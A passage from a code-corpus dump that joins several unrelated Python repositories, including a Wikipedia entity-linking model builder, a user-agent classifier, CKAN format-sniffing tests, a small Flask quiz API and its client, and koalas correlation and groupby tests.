ngram_id = ngrams.id;') def all_candidates(self, s): """Retrieve all candidate entities from a piece of text. Parameters ---------- s : {string, iterable over string} Tokens. If a string, it will be tokenized using a naive heuristic. Returns ------- candidates : iterable over (int, int, string, float) Candidate entities are 4-tuples of the indices `start` and `end` (both in tokenized input, and both start at 1), `target entity` (title of the Wikipedia article) and `probability` (commonness.) """ if isinstance(s, six.string_types): # XXX need a smarter tokenizer! s = s.split() else: s = tosequence(s) for i, j, s in ngrams_with_pos(s, self.N): if s in self.commonness: for target, prob in self.commonness[s]: yield i, j, target, prob def create_model(dump, db_file=':memory:', N=2): """Create a semanticizer model from a wikidump and store it in a DB. Parameters ---------- dump : string Filename of a Wikipedia dump, e.g., 'enwiki-20141106-pages-articles.xml.bz2' db_file : string (File)name of the sqlite3 DB. If `df_file` is `:memory:`, an in-memory db will be created, otherwise it is the filename of the disk-based db. Returns ------ db : sqlite3.Connection The handle to the newly created db containing the model. """ db = sqlite3.connect(db_file) _parse_stuff_to_db(dump, db, N=N) return db def _parse_stuff_to_db(fname, db, N=2): """Parses a wikidump, stores the model supplied db.""" cur = db.cursor() with open(createtables_path()) as create: cur.executescript(create.read()) dump = join(dirname(abspath(__file__)), fname) parse_dump(dump, db, N=N) return db def createtables_path(): """Return the full path to the DB initialization script.""" return join(dirname(__file__), "createtables.sql") ```
{ "source": "904labs/user-agent-ml", "score": 3 }
#### File: user-agent-ml/user_agent_ml/predict.py ```python from features import extract_features from docopt import docopt import util args = docopt(__doc__) def predict(clf, ua, vocabulary): """Predict if a patient is diagnosed with a disease.""" X = extract_features(ua, vocabulary) pred = clf.predict(X.toarray()) return X, pred if __name__ == "__main__": import cPickle as pickle import sys clf, vocabulary = pickle.load(open(args["<MODEL>"], "rb")) if len(sys.argv) != 3: print >> sys.stderr, "Usage: %s clf input_file" % sys.argv[0] sys.exit(1) count = 0 correct = 0 samples, _ = util.read(args["<DATABASE>"]) for ua, label in samples: X, Y_pred = predict(clf, ua, vocabulary) count += 1 if label == Y_pred: correct += 1 else: print ua, label, Y_pred[0] print X print print "Total: %d, Correct: %d, Ratio: %.2f" % (count, correct, (1.*correct/count)) ``` #### File: user-agent-ml/user_agent_ml/util.py ```python import sqlite3 import collections import re def read(dbfilename): # Open Database conn = sqlite3.connect(dbfilename) conn.text_factory = str c = conn.cursor() # Query c.execute('SELECT uaString, Type FROM data') counter = 0 vocabulary = {} samples = [] for item in c: if item[1] in ["Browser", "Mobile Browser"]: label = 1 else: label = 0 uaString = item[0] samples.append((uaString, label)) for token in gentokenlist(uaString): if token not in vocabulary: vocabulary[token] = counter counter += 1 return samples, vocabulary def ngrams(text, ngram=3): return map(lambda x: text[x:x+ngram], xrange(len(text)-ngram+1)) #end of ngrams def gentokenlist(uaString): tokenlist = [] for x in re.split('[.(),;/\s]',uaString.lower()): x = x.strip() if x : # number check tokenlist.append(rewrite(x)) return tokenlist def rewrite(x): # Performs various token rewrites # Strip whitespace x = x.strip() # Rewrite numbers to their length if x.isdigit(): return str(len(x)) # return length of number # Rewrite the common +http: token to http: elif x == "+http:": return "http:" # Common case - return the original string else: return x ```
{ "source": "905902029/group3_aip_a", "score": 3 }
#### File: 905902029/group3_aip_a/putin-judge.py ```python import random def putin(): print("请输入你想输入的单词!") w=input("input:") return w def judgeword(w): if w.islower(): print("全是小写字母,符合") else: print("不符合,请重新请输入单词") aa=putin() def countword(w): res={} for i in w: res[i]=w.count(i) c=len(res) print("输入的字符串中共有%d个不同的字母" %c) aa=putin() judgeword(aa) countword(aa) ```
{ "source": "908Inc/ckanext-qa", "score": 2 }
#### File: qa/tests/test_sniff_format.py ```python import os import logging from nose.tools import assert_equal from ckanext.qa.sniff_format import sniff_file_format, is_json, is_ttl, turtle_regex logging.basicConfig(level=logging.INFO) log = logging.getLogger('ckan.sniff') class TestSniffFormat: @classmethod def setup_class(cls): # Assemble a list of the test fixture data files. # They MUST have a file extension equal to the format they will be correctly # sniffed as. e.g. .xls or .xls.zip cls.fixture_files = [] # (format_extension, filepath) fixture_data_dir = os.path.join(os.path.dirname(__file__), 'data') for filename in os.listdir(fixture_data_dir): format_extension = '.'.join(filename.split('.')[1:]).replace('_', ' ') filepath = os.path.join(fixture_data_dir, filename) cls.fixture_files.append((format_extension, filepath)) @classmethod def assert_file_has_format_sniffed_correctly(cls, format_extension, filepath): '''Given a filepath, checks the sniffed format matches the format_extension.''' expected_format = format_extension sniffed_format = sniff_file_format(filepath, log) assert sniffed_format, expected_format expected_format_without_zip = expected_format.replace('.zip', '') assert_equal(sniffed_format['format'].lower(), expected_format_without_zip) expected_container = None if expected_format.endswith('.zip'): expected_container = 'ZIP' elif expected_format.endswith('.gzip'): expected_container = 'ZIP' # lumped together with zip for simplicity now assert_equal(sniffed_format.get('container'), expected_container) #def test_all(self): # for format_extension, filepath in self.fixture_files: # self.assert_file_has_format_sniffed_correctly(format_extension, filepath) @classmethod def check_format(cls, format, filename=None): for format_extension, filepath in cls.fixture_files: if format_extension == format: if filename: if filename in filepath: break else: continue else: break else: assert 0, format #Could not find fixture for format cls.assert_file_has_format_sniffed_correctly(format_extension, filepath) def test_xls(self): self.check_format('xls', '10-p108-data-results') def test_xls1(self): self.check_format('xls', 'August-2010.xls') def test_xls2(self): self.check_format('xls', 'ukti-admin-spend-nov-2011.xls') def test_xls3(self): self.check_format('xlsx', 'decc_local_authority_data_xlsx.xls') def test_xls_zip(self): self.check_format('xls.zip', 'telephone-network-data.xls.zip') def test_rdf(self): self.check_format('rdf', '300911---EH---organogram---ver1.rdf') def test_rdf2(self): self.check_format('rdf', 'ukk1202-36000.rdf') def test_pdf(self): self.check_format('pdf') def test_kml(self): self.check_format('kml') def test_rdfa(self): self.check_format('rdfa') def test_doc(self): self.check_format('doc') def test_json(self): self.check_format('json') def test_ods(self): self.check_format('ods') def test_odt(self): self.check_format('odt') def test_odp(self): self.check_format('odp') def test_ppt(self): self.check_format('ppt') def test_csv(self): self.check_format('csv', 'elec00.csv') def test_csv1(self): self.check_format('csv', 'spendover25kdownloadSep.csv') def test_csv2(self): self.check_format('csv', '311011.csv') def test_csv3(self): self.check_format('csv', 'FCOServices_TransparencySpend_May2011.csv') def test_csv4(self): self.check_format('csv', 'iwfg09_Phos_river_200911.csv') def test_csv5(self): self.check_format('csv', '9_sus_fisheries_201003.csv') def test_csv6(self): self.check_format('csv', 'Inpatients_MHA_Machine_readable_dataset_1011.csv') def test_shp(self): self.check_format('shp', 'HS2-ARP-00-GI-RW-00434_RCL_V4.shp') def test_shp2(self): self.check_format('shp', 'jncc_shapefile.shp') def test_gtfs(self): self.check_format('gtfs', 'manchester.gtfs') def test_html(self): self.check_format('html', 'index.html') def test_html1(self): self.check_format('html', '6a7baac6-d363-4a9d-8e9d-e584f38c05c3.html') def test_html2(self): self.check_format('html', 'hourly_means.html') def test_xml(self): self.check_format('xml', 'jobs.xml') def test_xml1(self): self.check_format('xml', '082010CreditorInvoicesover500.xml') def test_xml2(self): self.check_format('xml', 'DfidProjects-trunc.xml') def test_iati(self): self.check_format('iati') def test_rss(self): self.check_format('rss') def test_txt(self): self.check_format('txt') def test_txt_2(self): self.check_format('txt', 'terrible_csv.txt') def test_csv_zip(self): self.check_format('csv.zip', 'written_complains.csv.zip') def test_csv_zip1(self): self.check_format('csv.zip', 'cycle-area-list.csv.zip') def test_txt_zip(self): self.check_format('txt.zip') def test_xml_zip(self): self.check_format('xml.zip', 'FHRS501en-GB.xml.zip') #def test_torrent(self): # self.check_format('torrent') def test_psv(self): self.check_format('psv') def test_wms_1_3(self): self.check_format('wms', 'afbi_get_capabilities.wms') def test_wms_1_1_1(self): self.check_format('wms', 'oldham_get_capabilities.wms') def test_wfs_1_0(self): self.check_format('wfs', 'blaby_get_capabilities_1_0.wfs') def test_wfs_1_1(self): self.check_format('wfs', 'blaby_get_capabilities_1_1.wfs') def test_wfs_2_0(self): self.check_format('wfs', 'blaby_get_capabilities_2_0.wfs') def test_wmts(self): self.check_format('wmts', 'ukho_bathymetry.wmts') def test_wcs(self): self.check_format('wcs', 'ukho_bathymetry.wcs') def test_wcs2(self): self.check_format('wcs', 'ukho_bathymetry2.wcs') #def test_ics(self): # self.check_format('ics') def test_ttl1(self): self.check_format('ttl', 'turtle.ttl') def test_ttl2(self): self.check_format('ttl', 'turtle-imd-education-score-2010.ttl') def test_ttl3(self): self.check_format('ttl', 'turtle-homelessness-acceptances-per-1000.ttl') def test_atom(self): self.check_format('atom feed', 'os_products.atom_feed') def test_atom1(self): self.check_format('atom feed', 'SG_HumanHealthSafety.atom_feed') def test_is_json(): assert is_json('5', log) assert is_json('-5', log) assert is_json('-5.4', log) assert is_json('-5.4e5', log) assert is_json('-5.4e-5', log) assert not is_json('4.', log) assert is_json('"hello"', log) assert not is_json('hello"', log) assert is_json('["hello"]', log) assert not is_json('"hello"]', log) assert is_json('[5]', log) assert is_json('[5, 6]', log) assert is_json('[5,6]', log) assert is_json('["cat", 6]', log) assert is_json('{"cat": 6}', log) assert is_json('{"cat":6}', log) assert is_json('{"cat": "bob"}', log) assert is_json('{"cat": [1, 2]}', log) assert is_json('{"cat": [1, 2], "dog": 5, "rabbit": "great"}', log) assert not is_json('{"cat": [1, 2}]', log) assert is_json('[{"cat": [1]}, 2]', log) # false positives of the algorithm: #assert not is_json('[{"cat": [1]}2, 2]', log) def test_turtle_regex(): template = '<subject> <predicate> %s .' assert turtle_regex().search(template % '<url>') assert turtle_regex().search(template % '"a literal"') assert turtle_regex().search(template % '"translation"@ru') assert turtle_regex().search(template % '"literal type"^^<http://www.w3.org/2001/XMLSchema#string>') assert turtle_regex().search(template % '"literal typed with prefix"^^xsd:string') assert turtle_regex().search(template % "'single quotes'") assert turtle_regex().search(template % '"""triple quotes but not multiline"""') assert turtle_regex().search(template % "'''triple quotes but not multiline'''") assert turtle_regex().search(template % '12') assert turtle_regex().search(template % '1.12') assert turtle_regex().search(template % '.12') assert turtle_regex().search(template % '12E12') assert turtle_regex().search(template % '-4.2E-9') assert turtle_regex().search(template % 'false') assert turtle_regex().search(template % '_:blank_node') assert turtle_regex().search('<s> <p> <o> ;\n <p> <o> .') assert turtle_regex().search('<s> <p> <o>;<p> <o>.') # Include triples which are part of a nest: assert turtle_regex().search('<s> <p> <o> ;') assert turtle_regex().search('<s> <p> <o>;') assert turtle_regex().search(' ;<p> <o>.') assert turtle_regex().search(';\n<p> <o>.') assert turtle_regex().search(';\n<p> <o>;') assert not turtle_regex().search('<s> <p> <o>. rubbish') assert not turtle_regex().search(template % 'word') assert not turtle_regex().search(template % 'prefix:node') def test_is_ttl__num_triples(): triple = '<subject> <predicate> <object>; <predicate> <object>.' assert not is_ttl('\n'.join([triple]*2), log) assert is_ttl('\n'.join([triple]*5), log) ```
{ "source": "909041282/python-docs-hello-world", "score": 3 }
#### File: 909041282/python-docs-hello-world/app.py ```python import json from flask import Flask, abort, request from paper import Papers app = Flask(__name__) papers = Papers('./data/心理咨询师/') @app.route("/") def hello(): return "Hello, World!" @app.route("/index") def index(): return "Hello, index!" @app.route("/get_question", methods=['GET', 'POST']) def getQuestion(): try: data = json.loads(request.data) if data['function'] == 'allPaper': result = papers.getAllPaper() elif data['function'] == 'paper': result = papers.getAllQuestion(data['paper_name']) elif data['function'] == 'question': result = papers.getQuestion( data['paper_name'], data['type'], data['num']) return json.dumps(result) except: abort(500) ``` #### File: 909041282/python-docs-hello-world/client.py ```python import json import requests remote_url = 'https://miracleiweb.azurewebsites.net/' local_url = 'http://127.0.0.1:5000/' def getUrl(data): ret = requests.get(remote_url+'get_question',data=json.dumps(data)) print(json.loads(ret.text)) def getQuestion(): data={ 'function':'question', 'paper_name':'01', 'type':'single', "num":1 } getUrl(data) def getAllPapers(): data={ 'function': 'allPaper', } getUrl(data) def getPaper(): data={ 'function': 'paper', 'paper_name':'01' } getUrl(data) if __name__=="__main__": getQuestion() getAllPapers() getPaper() ```
{ "source": "90jam/koalas", "score": 3 }
#### File: databricks/koalas/ml.py ```python from typing import List, Tuple, TYPE_CHECKING import numpy as np import pandas as pd import pyspark from pyspark.ml.feature import VectorAssembler from pyspark.ml.stat import Correlation from databricks.koalas.utils import column_labels_level if TYPE_CHECKING: import databricks.koalas as ks CORRELATION_OUTPUT_COLUMN = "__correlation_output__" def corr(kdf: "ks.DataFrame", method: str = "pearson") -> pd.DataFrame: """ The correlation matrix of all the numerical columns of this dataframe. Only accepts scalar numerical values for now. :param kdf: the Koalas dataframe. :param method: {'pearson', 'spearman'} * pearson : standard correlation coefficient * spearman : Spearman rank correlation :return: :class:`pandas.DataFrame` >>> ks.DataFrame({'A': [0, 1], 'B': [1, 0], 'C': ['x', 'y']}).corr() A B A 1.0 -1.0 B -1.0 1.0 """ assert method in ("pearson", "spearman") ndf, column_labels = to_numeric_df(kdf) corr = Correlation.corr(ndf, CORRELATION_OUTPUT_COLUMN, method) pcorr = corr.toPandas() arr = pcorr.iloc[0, 0].toArray() if column_labels_level(column_labels) > 1: idx = pd.MultiIndex.from_tuples(column_labels) else: idx = pd.Index([label[0] for label in column_labels]) return pd.DataFrame(arr, columns=idx, index=idx) def to_numeric_df(kdf: "ks.DataFrame") -> Tuple[pyspark.sql.DataFrame, List[Tuple[str, ...]]]: """ Takes a dataframe and turns it into a dataframe containing a single numerical vector of doubles. This dataframe has a single field called '_1'. TODO: index is not preserved currently :param kdf: the Koalas dataframe. :return: a pair of dataframe, list of strings (the name of the columns that were converted to numerical types) >>> to_numeric_df(ks.DataFrame({'A': [0, 1], 'B': [1, 0], 'C': ['x', 'y']})) (DataFrame[__correlation_output__: vector], [('A',), ('B',)]) """ # TODO, it should be more robust. accepted_types = { np.dtype(dt) for dt in [np.int8, np.int16, np.int32, np.int64, np.float32, np.float64, np.bool_] } numeric_column_labels = [ label for label in kdf._internal.column_labels if kdf[label].dtype in accepted_types ] numeric_df = kdf._sdf.select( *[kdf._internal.spark_column_for(idx) for idx in numeric_column_labels] ) va = VectorAssembler(inputCols=numeric_df.columns, outputCol=CORRELATION_OUTPUT_COLUMN) v = va.transform(numeric_df).select(CORRELATION_OUTPUT_COLUMN) return v, numeric_column_labels ``` #### File: koalas/tests/test_ops_on_diff_frames_groupby.py ```python import unittest import pandas as pd from databricks import koalas as ks from databricks.koalas.config import set_option, reset_option from databricks.koalas.testing.utils import ReusedSQLTestCase, SQLTestUtils class OpsOnDiffFramesGroupByTest(ReusedSQLTestCase, SQLTestUtils): @classmethod def setUpClass(cls): super(OpsOnDiffFramesGroupByTest, cls).setUpClass() set_option("compute.ops_on_diff_frames", True) @classmethod def tearDownClass(cls): reset_option("compute.ops_on_diff_frames") super(OpsOnDiffFramesGroupByTest, cls).tearDownClass() def test_groupby_different_lengths(self): pdfs1 = [ pd.DataFrame({"c": [4, 2, 7, 3, None, 1, 1, 1, 2], "d": list("abcdefght")}), pd.DataFrame({"c": [4, 2, 7, None, 1, 1, 2], "d": list("abcdefg")}), pd.DataFrame({"c": [4, 2, 7, 3, None, 1, 1, 1, 2, 2], "d": list("abcdefghti")}), ] pdfs2 = [ pd.DataFrame({"a": [1, 2, 6, 4, 4, 6, 4, 3, 7], "b": [4, 2, 7, 3, 3, 1, 1, 1, 2]}), pd.DataFrame({"a": [1, 2, 6, 4, 4, 6, 4, 7], "b": [4, 2, 7, 3, 3, 1, 1, 2]}), pd.DataFrame({"a": [1, 2, 6, 4, 4, 6, 4, 3, 7], "b": [4, 2, 7, 3, 3, 1, 1, 1, 2]}), ] for pdf1, pdf2 in zip(pdfs1, pdfs2): kdf1 = ks.from_pandas(pdf1) kdf2 = ks.from_pandas(pdf2) for as_index in [True, False]: if as_index: sort = lambda df: df.sort_index() else: sort = lambda df: df.sort_values("c").reset_index(drop=True) self.assert_eq( sort(kdf1.groupby(kdf2.a, as_index=as_index).sum()), sort(pdf1.groupby(pdf2.a, as_index=as_index).sum()), ) self.assert_eq( sort(kdf1.groupby(kdf2.a, as_index=as_index).c.sum()), sort(pdf1.groupby(pdf2.a, as_index=as_index).c.sum()), ) self.assert_eq( sort(kdf1.groupby(kdf2.a, as_index=as_index)["c"].sum()), sort(pdf1.groupby(pdf2.a, as_index=as_index)["c"].sum()), ) def test_groupby_multiindex_columns(self): pdf1 = pd.DataFrame( {("y", "c"): [4, 2, 7, 3, None, 1, 1, 1, 2], ("z", "d"): list("abcdefght"),} ) pdf2 = pd.DataFrame( {("x", "a"): [1, 2, 6, 4, 4, 6, 4, 3, 7], ("x", "b"): [4, 2, 7, 3, 3, 1, 1, 1, 2],} ) kdf1 = ks.from_pandas(pdf1) kdf2 = ks.from_pandas(pdf2) self.assert_eq( kdf1.groupby(kdf2[("x", "a")]).sum().sort_index(), pdf1.groupby(pdf2[("x", "a")]).sum().sort_index(), ) self.assert_eq( kdf1.groupby(kdf2[("x", "a")], as_index=False) .sum() .sort_values(("y", "c")) .reset_index(drop=True), pdf1.groupby(pdf2[("x", "a")], as_index=False) .sum() .sort_values(("y", "c")) .reset_index(drop=True), ) self.assert_eq( kdf1.groupby(kdf2[("x", "a")])[[("y", "c")]].sum().sort_index(), pdf1.groupby(pdf2[("x", "a")])[[("y", "c")]].sum().sort_index(), ) def test_split_apply_combine_on_series(self): pdf1 = pd.DataFrame({"C": [0.362, 0.227, 1.267, -0.562], "B": [1, 2, 3, 4]}) pdf2 = pd.DataFrame({"A": [1, 1, 2, 2]}) kdf1 = ks.from_pandas(pdf1) kdf2 = ks.from_pandas(pdf2) for as_index in [True, False]: if as_index: sort = lambda df: df.sort_index() else: sort = lambda df: df.sort_values(list(df.columns)).reset_index(drop=True) with self.subTest(as_index=as_index): self.assert_eq( sort(kdf1.groupby(kdf2.A, as_index=as_index).sum()), sort(pdf1.groupby(pdf2.A, as_index=as_index).sum()), ) self.assert_eq( sort(kdf1.groupby(kdf2.A, as_index=as_index).B.sum()), sort(pdf1.groupby(pdf2.A, as_index=as_index).B.sum()), ) self.assert_eq( kdf1.B.groupby(kdf2.A).sum().sort_index(), pdf1.B.groupby(pdf2.A).sum().sort_index(), ) self.assert_eq( (kdf1.B + 1).groupby(kdf2.A).sum().sort_index(), (pdf1.B + 1).groupby(pdf2.A).sum().sort_index(), ) def test_aggregate(self): pdf1 = pd.DataFrame({"C": [0.362, 0.227, 1.267, -0.562], "B": [1, 2, 3, 4]}) pdf2 = pd.DataFrame({"A": [1, 1, 2, 2]}) kdf1 = ks.from_pandas(pdf1) kdf2 = ks.from_pandas(pdf2) for as_index in [True, False]: if as_index: sort = lambda df: df.sort_index() else: sort = lambda df: df.sort_values(list(df.columns)).reset_index(drop=True) with self.subTest(as_index=as_index): self.assert_eq( sort(kdf1.groupby(kdf2.A, as_index=as_index).agg("sum")), sort(pdf1.groupby(pdf2.A, as_index=as_index).agg("sum")), ) self.assert_eq( sort(kdf1.groupby(kdf2.A, as_index=as_index).agg({"B": "min", "C": "sum"})), sort(pdf1.groupby(pdf2.A, as_index=as_index).agg({"B": "min", "C": "sum"})), ) self.assert_eq( sort( kdf1.groupby(kdf2.A, as_index=as_index).agg( {"B": ["min", "max"], "C": "sum"} ) ), sort( pdf1.groupby(pdf2.A, as_index=as_index).agg( {"B": ["min", "max"], "C": "sum"} ) ), ) # multi-index columns columns = pd.MultiIndex.from_tuples([("Y", "C"), ("X", "B")]) pdf1.columns = columns kdf1.columns = columns columns = pd.MultiIndex.from_tuples([("X", "A")]) pdf2.columns = columns kdf2.columns = columns for as_index in [True, False]: stats_kdf = kdf1.groupby(kdf2[("X", "A")], as_index=as_index).agg( {("X", "B"): "min", ("Y", "C"): "sum"} ) stats_pdf = pdf1.groupby(pdf2[("X", "A")], as_index=as_index).agg( {("X", "B"): "min", ("Y", "C"): "sum"} ) self.assert_eq( stats_kdf.sort_values(by=[("X", "B"), ("Y", "C")]).reset_index(drop=True), stats_pdf.sort_values(by=[("X", "B"), ("Y", "C")]).reset_index(drop=True), ) stats_kdf = kdf1.groupby(kdf2[("X", "A")]).agg( {("X", "B"): ["min", "max"], ("Y", "C"): "sum"} ) stats_pdf = pdf1.groupby(pdf2[("X", "A")]).agg( {("X", "B"): ["min", "max"], ("Y", "C"): "sum"} ) self.assert_eq( stats_kdf.sort_values( by=[("X", "B", "min"), ("X", "B", "max"), ("Y", "C", "sum")] ).reset_index(drop=True), stats_pdf.sort_values( by=[("X", "B", "min"), ("X", "B", "max"), ("Y", "C", "sum")] ).reset_index(drop=True), ) def test_duplicated_labels(self): pdf1 = pd.DataFrame({"A": [3, 2, 1]}) pdf2 = pd.DataFrame({"A": [1, 2, 3]}) kdf1 = ks.from_pandas(pdf1) kdf2 = ks.from_pandas(pdf2) self.assert_eq( kdf1.groupby(kdf2.A).sum().sort_index(), pdf1.groupby(pdf2.A).sum().sort_index() ) self.assert_eq( kdf1.groupby(kdf2.A, as_index=False).sum().sort_values("A").reset_index(drop=True), pdf1.groupby(pdf2.A, as_index=False).sum().sort_values("A").reset_index(drop=True), ) def test_apply(self): pdf = pd.DataFrame( {"a": [1, 2, 3, 4, 5, 6], "b": [1, 1, 2, 3, 5, 8], "c": [1, 4, 9, 16, 25, 36]}, columns=["a", "b", "c"], ) pkey = pd.Series([1, 1, 2, 3, 5, 8]) kdf = ks.from_pandas(pdf) kkey = ks.from_pandas(pkey) self.assert_eq( kdf.groupby(kkey).apply(lambda x: x + x.min()).sort_index(), pdf.groupby(pkey).apply(lambda x: x + x.min()).sort_index(), ) self.assert_eq( kdf.groupby(kkey)["a"].apply(lambda x: x + x.min()).sort_index(), pdf.groupby(pkey)["a"].apply(lambda x: x + x.min()).sort_index(), ) self.assert_eq( kdf.groupby(kkey)[["a"]].apply(lambda x: x + x.min()).sort_index(), pdf.groupby(pkey)[["a"]].apply(lambda x: x + x.min()).sort_index(), ) self.assert_eq( kdf.groupby(["a", kkey]).apply(lambda x: x + x.min()).sort_index(), pdf.groupby(["a", pkey]).apply(lambda x: x + x.min()).sort_index(), ) def test_transform(self): pdf = pd.DataFrame( {"a": [1, 2, 3, 4, 5, 6], "b": [1, 1, 2, 3, 5, 8], "c": [1, 4, 9, 16, 25, 36]}, columns=["a", "b", "c"], ) pkey = pd.Series([1, 1, 2, 3, 5, 8]) kdf = ks.from_pandas(pdf) kkey = ks.from_pandas(pkey) self.assert_eq( kdf.groupby(kkey).transform(lambda x: x + x.min()).sort_index(), pdf.groupby(pkey).transform(lambda x: x + x.min()).sort_index(), ) self.assert_eq( kdf.groupby(kkey)["a"].transform(lambda x: x + x.min()).sort_index(), pdf.groupby(pkey)["a"].transform(lambda x: x + x.min()).sort_index(), ) self.assert_eq( kdf.groupby(kkey)[["a"]].transform(lambda x: x + x.min()).sort_index(), pdf.groupby(pkey)[["a"]].transform(lambda x: x + x.min()).sort_index(), ) self.assert_eq( kdf.groupby(["a", kkey]).transform(lambda x: x + x.min()).sort_index(), pdf.groupby(["a", pkey]).transform(lambda x: x + x.min()).sort_index(), ) def test_filter(self): pdf = pd.DataFrame( {"a": [1, 2, 3, 4, 5, 6], "b": [1, 1, 2, 3, 5, 8], "c": [1, 4, 9, 16, 25, 36]}, columns=["a", "b", "c"], ) pkey = pd.Series([1, 1, 2, 3, 5, 8]) kdf = ks.from_pandas(pdf) kkey = ks.from_pandas(pkey) self.assert_eq( kdf.groupby(kkey).filter(lambda x: any(x.a == 2)).sort_index(), pdf.groupby(pkey).filter(lambda x: any(x.a == 2)).sort_index(), ) self.assert_eq( kdf.groupby(kkey)["a"].filter(lambda x: any(x == 2)).sort_index(), pdf.groupby(pkey)["a"].filter(lambda x: any(x == 2)).sort_index(), ) self.assert_eq( kdf.groupby(kkey)[["a"]].filter(lambda x: any(x.a == 2)).sort_index(), pdf.groupby(pkey)[["a"]].filter(lambda x: any(x.a == 2)).sort_index(), ) self.assert_eq( kdf.groupby(["a", kkey]).filter(lambda x: any(x.a == 2)).sort_index(), pdf.groupby(["a", pkey]).filter(lambda x: any(x.a == 2)).sort_index(), ) def test_head(self): pdf = pd.DataFrame( { "a": [1, 1, 1, 1, 2, 2, 2, 3, 3, 3] * 3, "b": [2, 3, 1, 4, 6, 9, 8, 10, 7, 5] * 3, "c": [3, 5, 2, 5, 1, 2, 6, 4, 3, 6] * 3, }, ) pkey = pd.Series([1, 1, 1, 1, 2, 2, 2, 3, 3, 3] * 3) kdf = ks.from_pandas(pdf) kkey = ks.from_pandas(pkey) self.assert_eq( pdf.groupby(pkey).head(2).sort_index(), kdf.groupby(kkey).head(2).sort_index() ) self.assert_eq( pdf.groupby("a")["b"].head(2).sort_index(), kdf.groupby("a")["b"].head(2).sort_index() ) self.assert_eq( pdf.groupby("a")[["b"]].head(2).sort_index(), kdf.groupby("a")[["b"]].head(2).sort_index(), ) self.assert_eq( pdf.groupby([pkey, "b"]).head(2).sort_index(), kdf.groupby([kkey, "b"]).head(2).sort_index(), ) def test_cummin(self): pdf = pd.DataFrame( { "a": [1, 2, 3, 4, 5, 6] * 3, "b": [1, 1, 2, 3, 5, 8] * 3, "c": [1, 4, 9, 16, 25, 36] * 3, }, ) pkey = pd.Series([1, 1, 2, 3, 5, 8] * 3) kdf = ks.from_pandas(pdf) kkey = ks.from_pandas(pkey) self.assert_eq( kdf.groupby(kkey).cummin().sort_index(), pdf.groupby(pkey).cummin().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)["a"].cummin().sort_index(), pdf.groupby(pkey)["a"].cummin().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)[["a"]].cummin().sort_index(), pdf.groupby(pkey)[["a"]].cummin().sort_index(), almost=True, ) def test_cummax(self): pdf = pd.DataFrame( { "a": [1, 2, 3, 4, 5, 6] * 3, "b": [1, 1, 2, 3, 5, 8] * 3, "c": [1, 4, 9, 16, 25, 36] * 3, }, ) pkey = pd.Series([1, 1, 2, 3, 5, 8] * 3) kdf = ks.from_pandas(pdf) kkey = ks.from_pandas(pkey) self.assert_eq( kdf.groupby(kkey).cummax().sort_index(), pdf.groupby(pkey).cummax().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)["a"].cummax().sort_index(), pdf.groupby(pkey)["a"].cummax().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)[["a"]].cummax().sort_index(), pdf.groupby(pkey)[["a"]].cummax().sort_index(), almost=True, ) def test_cumsum(self): pdf = pd.DataFrame( { "a": [1, 2, 3, 4, 5, 6] * 3, "b": [1, 1, 2, 3, 5, 8] * 3, "c": [1, 4, 9, 16, 25, 36] * 3, }, ) pkey = pd.Series([1, 1, 2, 3, 5, 8] * 3) kdf = ks.from_pandas(pdf) kkey = ks.from_pandas(pkey) self.assert_eq( kdf.groupby(kkey).cumsum().sort_index(), pdf.groupby(pkey).cumsum().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)["a"].cumsum().sort_index(), pdf.groupby(pkey)["a"].cumsum().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)[["a"]].cumsum().sort_index(), pdf.groupby(pkey)[["a"]].cumsum().sort_index(), almost=True, ) def test_cumprod(self): pdf = pd.DataFrame( { "a": [1, 2, 3, 4, 5, 6] * 3, "b": [1, 1, 2, 3, 5, 8] * 3, "c": [1, 4, 9, 16, 25, 36] * 3, }, ) pkey = pd.Series([1, 1, 2, 3, 5, 8] * 3) kdf = ks.from_pandas(pdf) kkey = ks.from_pandas(pkey) self.assert_eq( kdf.groupby(kkey).cumprod().sort_index(), pdf.groupby(pkey).cumprod().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)["a"].cumprod().sort_index(), pdf.groupby(pkey)["a"].cumprod().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)[["a"]].cumprod().sort_index(), pdf.groupby(pkey)[["a"]].cumprod().sort_index(), almost=True, ) def test_diff(self): pdf = pd.DataFrame( { "a": [1, 2, 3, 4, 5, 6] * 3, "b": [1, 1, 2, 3, 5, 8] * 3, "c": [1, 4, 9, 16, 25, 36] * 3, } ) pkey = pd.Series([1, 1, 2, 3, 5, 8] * 3) kdf = ks.from_pandas(pdf) kkey = ks.from_pandas(pkey) self.assert_eq( kdf.groupby(kkey).diff().sort_index(), pdf.groupby(pkey).diff().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)["a"].diff().sort_index(), pdf.groupby(pkey)["a"].diff().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)[["a"]].diff().sort_index(), pdf.groupby(pkey)[["a"]].diff().sort_index(), almost=True, ) def test_rank(self): pdf = pd.DataFrame( { "a": [1, 2, 3, 4, 5, 6] * 3, "b": [1, 1, 2, 3, 5, 8] * 3, "c": [1, 4, 9, 16, 25, 36] * 3, }, ) pkey = pd.Series([1, 1, 2, 3, 5, 8] * 3) kdf = ks.from_pandas(pdf) kkey = ks.from_pandas(pkey) self.assert_eq( kdf.groupby(kkey).rank().sort_index(), pdf.groupby(pkey).rank().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)["a"].rank().sort_index(), pdf.groupby(pkey)["a"].rank().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)[["a"]].rank().sort_index(), pdf.groupby(pkey)[["a"]].rank().sort_index(), almost=True, ) @unittest.skipIf(pd.__version__ < "0.24.0", "not supported before pandas 0.24.0") def test_shift(self): pdf = pd.DataFrame( { "a": [1, 1, 2, 2, 3, 3] * 3, "b": [1, 1, 2, 2, 3, 4] * 3, "c": [1, 4, 9, 16, 25, 36] * 3, }, ) pkey = pd.Series([1, 1, 2, 2, 3, 4] * 3) kdf = ks.from_pandas(pdf) kkey = ks.from_pandas(pkey) self.assert_eq( kdf.groupby(kkey).shift().sort_index(), pdf.groupby(pkey).shift().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)["a"].shift().sort_index(), 